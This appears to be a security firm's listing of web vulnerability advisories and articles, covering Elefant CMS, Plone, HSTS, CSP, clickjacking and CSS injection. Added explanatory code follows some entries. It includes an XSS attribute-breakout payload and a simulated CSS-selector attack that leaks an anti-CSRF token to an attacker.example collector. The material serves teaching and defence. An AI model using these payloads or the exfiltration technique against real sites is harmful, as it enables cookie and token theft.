Recent Curesec Publications

Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS
2017 Feb 02

Elefant is a content management system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent XSS issues as well as one reflected XSS issue. Exploiting most of these vulnerabilities requires a user account, but registration is open by default. XSS allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

Elefant CMS 1.3.12-RC: Open Redirect, Host Header Injection, Leakage of Password Hashes
2017 Feb 02

Elefant is a content management system written in PHP. In version 1.3.12-RC, it is vulnerable to several low- to medium-impact issues, namely open redirect, host header injection, and leakage of password hashes. Open redirect and host header injection can be used for phishing attacks. The leakage of password hashes is restricted to users with an admin account.

Elefant CMS 1.3.12-RC: CSRF
2017 Feb 02

Elefant is a content management system written in PHP. In version 1.3.12-RC, it is vulnerable to cross-site request forgery. If a victim visits a website containing specially crafted code while logged into Elefant, an attacker can, for example, create a new admin account without the victim's knowledge.

Elefant CMS 1.3.12-RC: Code Execution
2017 Feb 02

Elefant is a content management system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution via two different vulnerabilities: it allows the upload of files with a dangerous type, and it is affected by PHP code injection. Exploiting either requires an editor or admin account.

HTTP Strict Transport Security (HSTS)
2017 Jan 27

This article gives a general overview of HTTP Strict Transport Security (HSTS), discusses which attacks it tries to prevent, and explains how to use it correctly.
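As an added example (not code from the Curesec article), the following parses a Strict-Transport-Security header value according to RFC 6797 and flags the deployment mistakes a reviewer usually looks for: a missing or too short max-age, max-age=0, a missing includeSubDomains, and a preload flag that the preload list would reject. The thresholds are those of RFC 6797 and the hstspreload.org submission rules; the header values shown in the usage are constructed.

```javascript
// Added example, not Curesec's code: parse a Strict-Transport-Security header value
// per RFC 6797 and flag common deployment mistakes. Sample headers are constructed.
const ONE_YEAR = 31536000; // seconds; the preload list requires max-age >= 1 year

function parseHsts(headerValue) {
  const result = { maxAge: null, includeSubDomains: false, preload: false, errors: [] };
  const seen = new Set();
  for (const raw of headerValue.split(';')) {
    const directive = raw.trim();
    if (!directive) continue;
    const eq = directive.indexOf('=');
    // directive names are case-insensitive; values may be a token or a quoted-string
    const name = (eq === -1 ? directive : directive.slice(0, eq)).trim().toLowerCase();
    const value = eq === -1 ? null : directive.slice(eq + 1).trim().replace(/^"(.*)"$/, '$1');
    // RFC 6797: each directive may appear only once
    if (seen.has(name)) { result.errors.push(`duplicate directive: ${name}`); continue; }
    seen.add(name);
    if (name === 'max-age') {
      if (value === null || !/^\d+$/.test(value)) { result.errors.push('max-age must be a non-negative integer'); continue; }
      result.maxAge = Number(value);
    } else if (name === 'includesubdomains') {
      result.includeSubDomains = true;
    } else if (name === 'preload') {
      result.preload = true;
    } // unknown directives are ignored, as RFC 6797 requires
  }
  if (result.maxAge === null && !seen.has('max-age')) result.errors.push('max-age is required');
  return result;
}

function auditHsts(headerValue) {
  const parsed = parseHsts(headerValue);
  const findings = [...parsed.errors];
  if (parsed.maxAge === 0) {
    findings.push('max-age=0 tells browsers to forget the policy');
  } else if (parsed.maxAge !== null && parsed.maxAge < ONE_YEAR) {
    findings.push(`max-age ${parsed.maxAge} is short: a policy that expires between visits reopens the SSL-stripping window`);
  }
  if (!parsed.includeSubDomains) {
    findings.push('includeSubDomains missing: a subdomain reached over plain HTTP can still set cookies for the parent domain');
  }
  if (parsed.preload && (parsed.maxAge === null || parsed.maxAge < ONE_YEAR || !parsed.includeSubDomains)) {
    findings.push('preload set, but the preload list requires max-age >= 31536000 and includeSubDomains');
  }
  return { ...parsed, findings };
}

// Usage with constructed header values
console.log(auditHsts('max-age=31536000; includeSubDomains; preload').findings); // []
console.log(auditHsts('max-age=300').findings);                                  // short max-age, no includeSubDomains
console.log(auditHsts('max-age=0').findings);                                    // policy removal
```

Note that the header only has an effect once the browser has seen it over a valid HTTPS connection; the first plain-HTTP visit is what the preload list is meant to cover, which is why the preload requirements above are stricter than what the browser itself enforces.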

Plone: XSS
2017 Jan 26

Plone is an open source CMS written in Python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS because it does not properly encode double quotes.
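The bug class named above, an encoder that handles `<`, `>` and `&` but not quotes, is harmless in a text node and fatal inside a double-quoted attribute. The following added example (not Plone's or Curesec's code) renders the same constructed payload through a text-only encoder and through a proper attribute encoder, and uses a small constructed tokenizer to show which attributes a browser would see in each case.

```javascript
// Added example, not Plone's or Curesec's code: a text-context encoder reused in an
// attribute context, beside the correct encoder. Payload and tokenizer are constructed.

// Sufficient for text between tags, but NOT for a double-quoted attribute value
function encodeHtmlText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute context additionally needs both quote characters encoded
function encodeHtmlAttr(s) {
  return encodeHtmlText(s).replace(/"/g, '&quot;').replace(/'/g, '&#x27;');
}

function renderInput(name, value, encode) {
  return `<input name="${encode(name)}" value="${encode(value)}">`;
}

// Simplified view of how a browser tokenizes the start tag: the attribute names it sees
function attributeNames(tag) {
  const inner = tag.replace(/^<input\s*/, '').replace(/>$/, '');
  const names = [];
  const attr = /([A-Za-z][\w-]*)(?:="[^"]*")?/g;
  let m;
  while ((m = attr.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed attacker input: closes the value attribute and adds an event handler
const PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

console.log(attributeNames(renderInput('q', PAYLOAD, encodeHtmlText))); // name, value, autofocus, onfocus
console.log(attributeNames(renderInput('q', PAYLOAD, encodeHtmlAttr))); // name, value
```

The lesson is that encoding is context-specific: the same value needs a different encoder in a text node, a quoted attribute, a URL, and a script block, and the quote character is exactly what separates the first two.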

Tap 'n' Sniff
2017 Jan 19

Written by Marco Lux, Mathis Hagen

This is the first of three articles about a small sniffing device that can be used for red team assessments as well as for day-to-day analysis. This part focuses on setting up the basics.

Content Security Policy (CSP)
2016 Dec 20

Content Security Policy (CSP) is an HTTP header that can be used as defense in depth to mitigate certain types of attacks, especially cross-site scripting (XSS) and clickjacking. This article explains when and how to use CSP.
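The following added example (not Curesec's code) parses a Content-Security-Policy header and flags the settings that quietly defeat the two protections named above: `'unsafe-inline'` in the effective script source list without a nonce or hash, a missing `object-src 'none'`, and a missing `frame-ancestors`, which is the one directive that does not fall back to `default-src` and is therefore easy to forget when the goal is to stop framing. Directive semantics follow the CSP Level 3 specification; the sample policies are constructed.

```javascript
// Added example, not Curesec's code: parse a CSP header and lint it for settings that
// defeat its XSS and clickjacking protections. Sample policies are constructed.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // CSP: when a directive name repeats, the first occurrence wins, later ones are ignored
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function lintCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];

  // script-src falls back to default-src; with neither, script loading is unrestricted
  const scriptSrc = d.get('script-src') || d.get('default-src');
  if (!scriptSrc) {
    findings.push('no script-src or default-src: script loading is unrestricted');
  } else {
    const hasNonceOrHash = scriptSrc.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
    // 'unsafe-inline' is ignored when a nonce or hash is present; otherwise it re-enables
    // inline <script> blocks and event handler attributes, i.e. the classic XSS vectors
    if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline' without nonce/hash: inline XSS is not mitigated");
    }
    if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval'");
    if (scriptSrc.some(s => s === '*' || s === 'data:' || s === 'https:')) {
      findings.push('script-src includes a wildcard-like source (*, data:, https:): any matching origin can supply scripts');
    }
  }

  // object-src falls back to default-src; plugin content can otherwise execute script
  const objectSrc = d.get('object-src') || d.get('default-src');
  if (!objectSrc || !objectSrc.includes("'none'")) findings.push("object-src is not 'none'");

  // frame-ancestors does NOT fall back to default-src: without it CSP says nothing about framing
  const frameAncestors = d.get('frame-ancestors');
  if (!frameAncestors) {
    findings.push('frame-ancestors missing: CSP does not restrict framing (clickjacking)');
  } else if (frameAncestors.includes('*')) {
    findings.push("frame-ancestors '*' allows any site to frame the page");
  }
  return findings;
}

// Usage with constructed policies
console.log(lintCsp("default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none'; frame-ancestors 'none'"));
console.log(lintCsp("default-src 'none'"));
console.log(lintCsp("script-src 'nonce-r4nd0m' 'unsafe-inline'; object-src 'none'; frame-ancestors 'self'"));
```

The second policy looks strict but still allows framing by anyone, which is the clickjacking case discussed in the article below on advanced clickjacking attacks; the third shows the nonce-plus-`'unsafe-inline'` pattern that keeps old browsers working while modern ones ignore the unsafe keyword.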

Advanced Clickjacking Attacks
2016 Dec 08

Written by Tim Coen

It is often assumed that allowing a site to be framed only has minor security implications. Clickjacking in particular is often associated with low-impact issues such as stealing Facebook likes. This article will show that allowing a site to be framed may be a more potent attack vector than often assumed. Framing makes some vulnerabilities easier or more realistic to exploit. Clickjacking can be used for more than just stealing likes, and in some contexts Clickjacking can gain the full power of CSRF - albeit with more user interaction.  

Reading Data via CSS Injection
2016 Dec 01

Because modern browsers do not allow the execution of JavaScript via CSS, CSS Injection is often seen as very limited, with the main dangers being defacement by placing images into the vulnerable application, or performing very limited phishing attacks by placing additional content in places a user would not expect user-controlled data to show. This article will show that it is possible to use CSS Injections to read out secret data in a vulnerable web application, independent of the browser used by the victim. With a successful attack, it would for example be possible to read out an anti-CSRF token and thus to perform CSRF attacks.
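As an added example (not code from the Curesec article), the following simulates the widely used attribute-selector approach to CSS-based exfiltration, assumed here since the summary above does not say which technique the article uses: for each candidate next character the attacker emits a rule whose selector matches only if the token starts with that guess, and whose background URL reports the guess to the attacker. Both sides are simulated offline: `buildProbeRules` is the attacker, `simulateBrowser` stands in for the victim's browser, and `leakToken` runs the rounds. The collector URL, the `csrf` field name and the token values are constructed.

```javascript
// Added example, not Curesec's code: simulate leaking an anti-CSRF token character by
// character through CSS attribute selectors. Collector URL, field name and tokens are constructed.
const COLLECTOR = 'https://attacker.example/leak'; // hypothetical attacker-controlled endpoint

// Attacker side: one exact-match rule to detect completion, plus one prefix probe per character.
// By construction at most one rule in a round can match a given token.
function buildProbeRules(known, charset) {
  const rules = [
    `input[name="csrf"][value="${known}"]{background:url(${COLLECTOR}?done=${encodeURIComponent(known)})}`,
  ];
  for (const c of charset) {
    const guess = known + c;
    rules.push(`input[name="csrf"][value^="${guess}"]{background:url(${COLLECTOR}?p=${encodeURIComponent(guess)})}`);
  }
  return rules.join('\n');
}

// Victim side (constructed stand-in for the browser): apply the rules to an <input name="csrf">
// whose value attribute is tokenValue and return the background URL the browser would fetch.
function simulateBrowser(css, tokenValue) {
  const rule = /input\[name="csrf"\]\[value(\^?)="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const [, op, needle, url] = m;
    const matches = op === '^' ? tokenValue.startsWith(needle) : tokenValue === needle;
    if (matches) return url;
  }
  return null; // nothing matched: no request, the attacker learns nothing this round
}

// Drive the rounds: each round injects fresh CSS built from what is known so far.
function leakToken(tokenValue, charset, maxRounds = 100) {
  let known = '';
  const requests = [];
  for (let round = 0; round < maxRounds; round++) {
    const url = simulateBrowser(buildProbeRules(known, charset), tokenValue);
    if (url === null) return { token: known, complete: false, requests }; // charset misses the next char
    requests.push(url);
    const params = new URL(url).searchParams;
    if (params.has('done')) return { token: params.get('done'), complete: true, requests };
    known = params.get('p');
  }
  return { token: known, complete: false, requests };
}

// Usage with a constructed hex token
console.log(leakToken('a3f9', '0123456789abcdef')); // token 'a3f9', complete, 5 requests
```

Two practical caveats a tester will hit: each round needs a way to deliver new CSS to the victim (for example reloading the injected page or stylesheet in an iframe), and the rules only fire on an element that is actually rendered, so a hidden input has to be reached through a sibling or descendant combinator rather than styled directly. The selector matching itself is plain CSS, which is why the attack works regardless of the victim's browser.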